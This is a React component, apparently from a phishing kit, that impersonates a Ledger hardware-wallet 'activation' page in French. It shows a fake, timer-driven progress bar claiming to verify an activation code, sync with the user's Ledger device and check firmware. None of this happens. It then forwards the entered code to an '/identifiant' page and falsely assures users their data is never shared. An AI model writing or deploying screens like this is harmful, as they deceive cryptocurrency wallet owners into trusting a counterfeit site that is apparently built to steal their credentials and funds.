import React, { useState, useEffect } from 'react';
import { useLocation, useNavigate } from 'react-router-dom';
import '../components/Activation.css';

const LoadingActivation = () => {
  const location = useLocation();
  const navigate = useNavigate();
  const { version = '2.3', code = '' } = location.state || {};

  const [progress, setProgress] = useState(0);
  const [statusText, setStatusText] = useState('Verification...');
  const [isComplete, setIsComplete] = useState(false);

  const loadingMessages = [
    'Verification...',
    'Verification du code activation...',
    'Synchronisation avec votre appareil Ledger...',
    'Verification de la version du firmware...',
    'Configuration de la securite...',
    "Finalisation de l'activation..."
  ];

  useEffect(() => {
    let currentStep = 0;
    const totalSteps = loadingMessages.length;
    const duration = 6000;
    const intervalTime = duration / 100;

    const progressInterval = setInterval(() => {
      setProgress((prev) => {
        const newProgress = prev + 1;
        const stepIndex = Math.floor((newProgress / 100) * totalSteps);

        if (stepIndex !== currentStep && stepIndex < totalSteps) {
          currentStep = stepIndex;
          setStatusText(loadingMessages[stepIndex]);
        }

        if (newProgress >= 100) {
          clearInterval(progressInterval);
          setIsComplete(true);
          setStatusText('Verification terminee');

          setTimeout(() => {
            navigate('/identifiant', {
              state: { version, code }
            });
          }, 1000);

          return 100;
        }
        return newProgress;
      });
    }, intervalTime);

    return () => clearInterval(progressInterval);
  }, [navigate, version, code]);

  return (
    <div className="loading-activation-page">
      <div className="loading-step-badge">
        <span className="step-number">Etape 1</span>
        <span className="step-separator">—</span>
        <span>Appareil</span>
      </div>

      <div className="loading-activation-card">
        <div className="loading-activation-icon">
          {!isComplete ? (
            <>
              <div className="pulse-ring"></div>
              <div className="pulse-ring" style={{ animationDelay: '0.4s' }}></div>
              <div className="pulse-ring" style={{ animationDelay: '0.8s' }}></div>
              <div className="spinner-ledger"></div>
            </>
          ) : (
            <div className="checkmark-ledger">
              <svg viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="3" strokeLinecap="round" strokeLinejoin="round">
                <polyline points="20 6 9 17 4 12" />
              </svg>
            </div>
          )}
        </div>

        <h2 className="loading-activation-title">
          {isComplete ? 'Appareil verifié' : 'Verification...'}
        </h2>

        <p className="loading-activation-status">{statusText}</p>

        <p className="loading-activation-version">
          Version {version} detectee. Synchronisation avec votre appareil Ledger...
        </p>

        <div className="loading-activation-progress-container">
          <div 
            className="loading-activation-progress-bar" 
            style={{ width: `${progress}%` }}
          ></div>
        </div>

        <span className="loading-activation-percent">{progress}%</span>
      </div>

      <div className="loading-activation-security">
        <svg viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round">
          <path d="M12 22s8-4 8-10V5l-8-3-8 3v7c0 6 8 10 8 10z" />
        </svg>
        <span>Connexion securisee. Vos donnees ne sont jamais partagees avec des tiers.</span>
      </div>
    </div>
  );
};

export default LoadingActivation;